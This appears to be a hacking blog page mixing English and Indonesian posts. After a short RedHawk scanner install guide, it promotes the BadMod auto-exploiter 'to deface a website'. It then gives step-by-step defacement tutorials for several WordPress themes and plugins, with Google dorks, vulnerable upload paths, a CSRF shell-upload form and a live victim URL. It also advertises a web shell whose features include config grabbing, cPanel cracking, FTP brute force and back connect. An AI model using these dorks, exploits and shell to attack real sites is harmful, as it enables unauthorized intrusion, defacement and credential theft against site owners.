Maxteroit: CMS WordPress

Redhawk Powerful Information Gathering Tools and Vulnerability Scanning

 

Redhawk, Powerful Information Gathering and Vulnerability Scanning Tools

Ok, in this post, i would like to review powerful tools for Information Gathering and Vulnerability Scanning, its tool called RedHawk , ok let's try it.

#Installing

1. I will use Git Clone methods from GitHub;
use this command :
git clone https://github.com/Tuhinshubhra/RED_HAWK.git
2. Next, enter the directory by command cd .

3. Look at this picture :


there is no permission for executing that file, so we must change mod for the file, use this command :
chmod +x rhawk.php

#Running

1. Command :
php rhawk.php

2.  Ok, after you run this tool, for the first time, you must enter a website domain, for example, i use my domain website www.maxteroit.com :


3. Choose HTTP or HTTPS of that website :


4. And then, Menu tools will be printed :


Ok I will try 1 Scanner, i choose Blogger View Scanner, and the result is :


Just that tutorials from me, and if you find an error in the script, you can ask me in the comment, or mail me [email protected]
Thank's

Redhawk Powerful Information Gathering and Vulnerability Scanning Tools


You want to deface a website but do not have any language programming skills?
Don't worry. You can deface website easily using termux with BadMod tool Detect Website CMS, Website Scanner & Auto Exploiter.

BadMod Detect Website CMS, Website Scanner & Auto Exploiter


Features

  • Vulnerabilties Scanner
  • Dorking
  • Cms Detector
  • Auto Exploit :
    1. Wordpress
    2. Joomla
    3. Drupal
    4. Cms made simple

Installation

$ pkg update && update
$ pkg install git php curl nano
$ git clone https://github.com/MrSqar-Ye/BadMod
$ cd BadMod
$ nano BadMod.php

Delete this code, see the image


to be, see the image


And save, press ctrl+x and type Y, hit the enter
Run the tools using command :
$ php BadMod.php

Choose the number whatever you want
If you want to dorking use this command :


$ php Dorker.php

How To Hack Website Easily With BadMod Auto Exploit Tool

Malem fans :p
Lama yak gaketemu :v

Kali ini gw mau share Tutorial Deface Wordpress Plugin WP-DreamWork Gallery
Lansung ajaaa

Bahan: 
1. Dork : Kembangin lagi pake otak vokepers kalian :p
inurl:/wp-content/plugins/wp-dreamworkgallery/
2. CSRF :
Klik disini

Langkah - langkah :
1. Dorking ke gugel :v

2. Pilih salah satu site.

3. Masukin target lu ke CSRF nya.

4. Buka CSRF nya.

5. Pilih file/shell yg mau lu upload.

6. Kalo sukses bakal ada nama file kalian beserta file akses nya :)

7. Tinggal buka aja deh :)

Kalo masih belum jelas, bisa liat video dibawah :)


Okee, sekian tutorial gw kali ini. Kalo masih ada yg belum ngerti, ada kolom komentar di bawah :)
.
Regards,
Berandal. [OWL SQUAD]

Deface Wordpress Plugin WP-DreamWorkGallery

 Deface Wordpress Themes Multimedia1

 

Hello sobat maxteroit, kali ini saya (Berandal) akan share my new POC about deface wordpress, metodenya yaitu Wordpress themes multimedia1 shell upload vulnerability.
Berikut dokumentasi yg telah saya upload ke web tempat upload poc hacking :

   
Wordpress Themes Multimedia1 Shell Upload Vulnerability | CSRF
Author : Berandal
Google Dork: inurl:/wp-content/themes/multimedia1/
Tested on: Win 7, Linux
Blog : http://www.maxteroit.com/

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

[!] Exploit : http://127.0.0.1/wp-content/themes/multimedia1/server/php/

[!] File Location : http://127.0.0.1/wp-content/themes/multimedia1/server/php/files/shell.php
[*] CSRF:
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/multimedia1/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>


[*] ABOUT:

Facebook: https://www.facebook.com/owlsquad.id
Twitter: https://www.twitter.com/id_berandal
Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.

Deface Wordpress Themes Multimedia1

Tampilan Halaman Login

Haii, Kali ini gw mau share Shell buatan gw sendiri :) Shell ini gw recode dari IndoXploit Shell First Edition.
Thanks buat IndoXploit Coders Team. :)
Semua fitur dalam shell ini dibuat auto tinggal Klik-Klik sajaa.
Tampilan Shell

[RELEASE] Berandal Shell First Edition V.1

Fitur Berandal Shell:

  • K-RDP Shell
  • Fitur untuk membuat Akun RDP yang dapat digunakan hanya di Windows server.
  • Back Connect
  • CPanel/FTP Auto Deface
  • Memakai alur ftp_connect, hanya memanfaatkan kesamaan password cpanel & ftp saja. tidak semuanya bisa hanya web yang ftp nya sama dengan user/pass cpanel nya yang bisa otomatis di deface.
  • Config Grabb
    • Popoji CMS
    • Voodoo CMS
    • Wordpress
    • Joomla
    • Drupal
    • Magento
    • Ellislab Devteam [CI]
    • Opencart
    • Prestashop
    • phpBB
    • Lokomedia
    • Sitelook
    • Bosweb
    • WHMCS
    • Cpanel


Jumping [error fixed] :
Jumping hpshere & Jumping /var/vhosts [ updated ]
Kelebihannyaa bisa langsung ambil nama domainnyaa :
Cpanel Crack [blank user/pass fixed]:
Fitur ini udah otomatis Grab Passwordnyaa dan juga otomatis mengambil info domain nya, ikutin saja petunjuknya .
SMTP Grabber :
Hanya mengambil info smtp joomla yg ada di config.
Auto edit user / MPC :
Udah otomatis edit seluruh user admin dari config *ga semuanya , cuma beberapa cms aja
Disetiap tools tertentu ada "NB" ikutin petunjuknya sajaa.

Dan fitur tambahan :

  1. Server Info.
  2. PHP Info.
  3. Who Is Lookup.
  4. Safe Mode.
  5. Shell Finder.
  6. FTP Brute Force.
  7. Bypass etc/passw.
  8. CMS Lokomedia Exploiter.
  9. CMS Balitbang Exploiter.
  10. Port Scan.
  11. Zip Menu, [Upload and Unzip, ZIP Backup, Unzip Manual].
  12. Shell Checker.
  13. Hash ID.
  14. String Encoder.
  15. Network [Bind Port, Back Connect, Metasploit Connection].
========================================================================
========================================================================
Selamat Menikmati :)

Spesial Thanks:
.

Regards,
Berandal, [OWL SQUAD]

[RELEASE] Berandal Shell First Edition V.1



Haii fans :P
Kali ini gw mau share Tutorial Deface Wordpress Theme Theagency. :)

Bahan:
1. Dork.
inurl:/wp-content/themes/theagency
2. Exploit.
/wp-content/themes/theagency/includes/uploadify/uploadify.php

3. CSRF.
 Ambil disini.

Langkah - Langkah:

1. Dorking ke google.

2. Pilih salah satu site.

3. Masukin exploitnya.

4. Vuln = Blank.

5. Masukin site ke CSRF.

6. Pilih file/shell/ yg mau lu upload.

7. Kalo file sukses ke upload, bakal muncul angka '1'.

Akses file? 
/wp-content/themes/theagency/includes/uploadify/uploads/namafile 
contoh:
http://google.com/wp-content/themes/theagency/includes/uploadify/uploads/namafile

Kalo masih kurang jelas, simak video tutorial gw :

 

Okee, sekian tutorial gw kali ini, semoga bermanfaat :)

Regards, 

Deface Wordpress Theme Theagency






Pagii heker :p . Sekarang gw mau sare deface Metode Themes WordPress Themes RightNow,
mumpung lagi di net :), langsung saja siapain bahan bahannya :


BAHAN:
1. Dork: 

  • inurl:/wp-content/themes/RightNow/ 
  • inurl:/wp-content/themes/RightNow/includes/
  • Index Of intext:themes/rightnow/
  • Selebihnya gunain otak Bokeper :V


2. Exploit:
/wp-content/themes/RightNow/includes/uploadify/upload_background_image.php
contoh:
gugel.com/wp-content/themes/RightNow/includes/uploadify/upload_background_image.php


3.  CSRF. Ambil disini.


LANGKAH - LANGKAH:

1. Dorking ke google. Klik disini.

2. Pilih salah satu site.

3. Masukkan exploit nya.

4. Kalo vuln akan blank.

5. Masukkan ke CSRF.

6. Kalo file sukses ke upload bakal ada angka '1' .

7. Akses file?
site.com/wp-content/uploads/galleryimages/


Kalo masih belum jelas, simak video gw dibawah :D




Okee, sekian tutorial gw kali ini :) See ya next time :*
Kalo pengen belajar bareng, bisa gabung grup Facebook OWL SQUAD :) Klik.
Bisa juga follow twitter gw :v Twitter.


Regards,

Deface Wordpress Themes RightNow

Hallo fanss :* Berandal disini :)
Kali ini gw mau share Tutorial Deface Wordpress Themes ThisWay . Sebenernya ini Bug lama, tapi gada salahnya share :v Sapa tau masih Crotz :P


Bahan:
1. Xampp (DOWNLOAD)
2. Exploter (PHP) - [SEDOT]
2. CSRF (Buat yg males pake xampp :v) [SEDOT]
3. Shell atau Script Deface (Kalo belom punya, bisa ambil disini.)


Langkah:
1. Dorking di google.

2. Pilih salah satu site.

3. Masukin exploitnya.

4. Vuln:
{"status":"NOK", "ERR":"This file is incorect"}

5. Masukin ke CSRF

6. Kalo sukses bakal kluar nama file lu :)

7. Akses file?
site.co.li/wp-content/uploads/2017/02/namafile
contoh:
http://larryfarfan.com/wp-content/uploads/2017/02/settingsimage_h5aQ4ZfXcBYM6gSM.txt

Masih kurang jelas?
Simak video gw dibawah :)



Okee, cukup buat tutorial kali ini, Semoga Bermanfaat :)
.
Regards,
Berandal, [OWL SQUAD]

Deface Wordpress Themes ThisWay

Subscribe Our Newsletter